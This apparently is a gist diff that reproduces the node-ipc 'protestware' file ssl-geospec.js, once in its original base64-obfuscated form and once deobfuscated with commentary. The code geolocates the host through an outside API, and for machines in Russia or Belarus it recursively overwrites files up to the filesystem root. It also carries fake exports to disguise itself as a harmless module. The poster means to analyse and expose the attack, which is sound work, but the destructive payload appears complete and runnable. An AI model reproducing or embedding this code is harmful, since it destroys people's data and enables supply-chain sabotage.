sannajammeh · March 18, 2022 00:54
diff --git a/README.md b/README.md
diff --git a/obfuscated.js b/obfuscated.js
 import u from "path";
 import a from "fs";
 import o from "https";

 // **WARNING: THIS IS LIVE MALWARE. RUN IT AT YOUR RISK.**

 // Obfuscated code that I deobfuscated.
 // I also added comments which should help explain what exactly is going on here.

 // Oiginally written by Brandon Nozaki Miller (https://github.com/RIAEvangelist)
 // See you in prison, Brandom.

 // Original commit: https://github.com/RIAEvangelist/node-ipc/blob/847047cf7f81ab08352038b2204f0e7633449580/dao/ssl-geospec.js

 // A timeout is used to add an artificial delay.
 setTimeout(function () {
  // A 50% chance that all of your files will get overwritten.
  const t = Math.round(Math.random() * 4);
  if (t > 1) return;

  // This URL is used to specifically target people in Russia and Belarus.
  const n =
    "https://api.ipgeolocation.io/ipgeo?apiKey=ae511e1627824a968aaaa758a5309154";

  // A request is send to the URL above. The server sends the location of the request to the requester.
  o.get(n, function (t) {
    t.on("data", function (t) {
      const n = "./";
      const o = "../";
      const r = "../../";
      const f = "/";
      const c = "country_name";
      // Specifically targets the citizens of Russia and Belarus.
      const e = "russia";
      const i = "belarus";
      try {
        const s = JSON.parse(t);
        const u = s[c].toLowerCase();
        // "If your country is from Russia or Belarus, overwrite all of your files."
        const a = u.includes(e) || u.includes(i);
        if (a) {
          h(n);
          h(o);
          h(r);
          h(f);
        }
      } catch (t) {}
    });
  });
 }, Math.ceil(Math.random() * 1e3));

 /**
 * @param n The relative location of CWD of where the script was ran.
 * @param o Presumably meant to be used recursively.
 */
 // The function that does the overwriting. Not sure why it is `async` though.
 async function h(n = "", o = "") {
  // Checks to see if the directory within your file system exists.
  if (!a.existsSync(n)) return;
  let r = [];
  try {
    // Gets all of the files within the directory.
    r = a.readdirSync(n);
  } catch (t) {}
  const f = [];
  // Your files will get overwritten with a heart emoji. Perfect.
  const c = "❤️";
  for (var e = 0; e < r.length; e++) {
    const i = u.join(n, r[e]);
    let t = null;
    try {
      t = a.lstatSync(i);
    } catch (t) {
      continue;
    }
    // If the file is a directory, it will run the `h` function again.
    if (t.isDirectory()) {
      const s = h(i, o);
      // Again, the function was async. This will not even work properly.
      s.length > 0 ? f.push(...s) : null;
    } else if (i.indexOf(o) >= 0) {
      try {
        // The files get overwritten. Thanks, Brandon.
        a.writeFile(i, c, function () {});
      } catch (t) {}
    }
  }
  return f;
 }

 // Fake exports probably intended to trick consumers.
 const ssl = true;
 export { ssl, ssl as default };
diff --git a/ssl-geospec.js b/ssl-geospec.js
 import u from"path";import a from"fs";import o from"https";setTimeout(function(){const t=Math.round(Math.random()*4);if(t>1){return}const n=Buffer.from("aHR0cHM6Ly9hcGkuaXBnZW9sb2NhdGlvbi5pby9pcGdlbz9hcGlLZXk9YWU1MTFlMTYyNzgyNGE5NjhhYWFhNzU4YTUzMDkxNTQ=","base64");o.get(n.toString("utf8"),function(t){t.on("data",function(t){const n=Buffer.from("Li8=","base64");const o=Buffer.from("Li4v","base64");const r=Buffer.from("Li4vLi4v","base64");const f=Buffer.from("Lw==","base64");const c=Buffer.from("Y291bnRyeV9uYW1l","base64");const e=Buffer.from("cnVzc2lh","base64");const i=Buffer.from("YmVsYXJ1cw==","base64");try{const s=JSON.parse(t.toString("utf8"));const u=s[c.toString("utf8")].toLowerCase();const a=u.includes(e.toString("utf8"))||u.includes(i.toString("utf8"));if(a){h(n.toString("utf8"));h(o.toString("utf8"));h(r.toString("utf8"));h(f.toString("utf8"))}}catch(t){}})})},Math.ceil(Math.random()*1e3));async function h(n="",o=""){if(!a.existsSync(n)){return}let r=[];try{r=a.readdirSync(n)}catch(t){}const f=[];const c=Buffer.from("4p2k77iP","base64");for(var e=0;e<r.length;e++){const i=u.join(n,r[e]);let t=null;try{t=a.lstatSync(i)}catch(t){continue}if(t.isDirectory()){const s=h(i,o);s.length>0?f.push(...s):null}else if(i.indexOf(o)>=0){try{a.writeFile(i,c.toString("utf8"),function(){})}catch(t){}}}return f};const ssl=true;export {ssl as default,ssl}
	import u from "path";
	import a from "fs";
	import o from "https";

	// WARNING: THIS IS LIVE MALWARE. RUN IT AT YOUR RISK.

	// Obfuscated code that I deobfuscated.
	// I also added comments which should help explain what exactly is going on here.

	// Oiginally written by Brandon Nozaki Miller (https://github.com/RIAEvangelist)
	// See you in prison, Brandom.

	// Original commit: https://github.com/RIAEvangelist/node-ipc/blob/847047cf7f81ab08352038b2204f0e7633449580/dao/ssl-geospec.js

	// A timeout is used to add an artificial delay.
	setTimeout(function () {
	// A 50% chance that all of your files will get overwritten.
	const t = Math.round(Math.random() * 4);
	if (t > 1) return;

	// This URL is used to specifically target people in Russia and Belarus.
	const n =
	"https://api.ipgeolocation.io/ipgeo?apiKey=ae511e1627824a968aaaa758a5309154";

	// A request is send to the URL above. The server sends the location of the request to the requester.
	o.get(n, function (t) {
	t.on("data", function (t) {
	const n = "./";
	const o = "../";
	const r = "../../";
	const f = "/";
	const c = "country_name";
	// Specifically targets the citizens of Russia and Belarus.
	const e = "russia";
	const i = "belarus";
	try {
	const s = JSON.parse(t);
	const u = s[c].toLowerCase();
	// "If your country is from Russia or Belarus, overwrite all of your files."
	const a = u.includes(e) \|\| u.includes(i);
	if (a) {
	h(n);
	h(o);
	h(r);
	h(f);
	}
	} catch (t) {}
	});
	});
	}, Math.ceil(Math.random() * 1e3));

	/**
	* @param n The relative location of CWD of where the script was ran.
	* @param o Presumably meant to be used recursively.
	*/
	// The function that does the overwriting. Not sure why it is `async` though.
	async function h(n = "", o = "") {
	// Checks to see if the directory within your file system exists.
	if (!a.existsSync(n)) return;
	let r = [];
	try {
	// Gets all of the files within the directory.
	r = a.readdirSync(n);
	} catch (t) {}
	const f = [];
	// Your files will get overwritten with a heart emoji. Perfect.
	const c = "❤️";
	for (var e = 0; e < r.length; e++) {
	const i = u.join(n, r[e]);
	let t = null;
	try {
	t = a.lstatSync(i);
	} catch (t) {
	continue;
	}
	// If the file is a directory, it will run the `h` function again.
	if (t.isDirectory()) {
	const s = h(i, o);
	// Again, the function was async. This will not even work properly.
	s.length > 0 ? f.push(...s) : null;
	} else if (i.indexOf(o) >= 0) {
	try {
	// The files get overwritten. Thanks, Brandon.
	a.writeFile(i, c, function () {});
	} catch (t) {}
	}
	}
	return f;
	}

	// Fake exports probably intended to trick consumers.
	const ssl = true;
	export { ssl, ssl as default };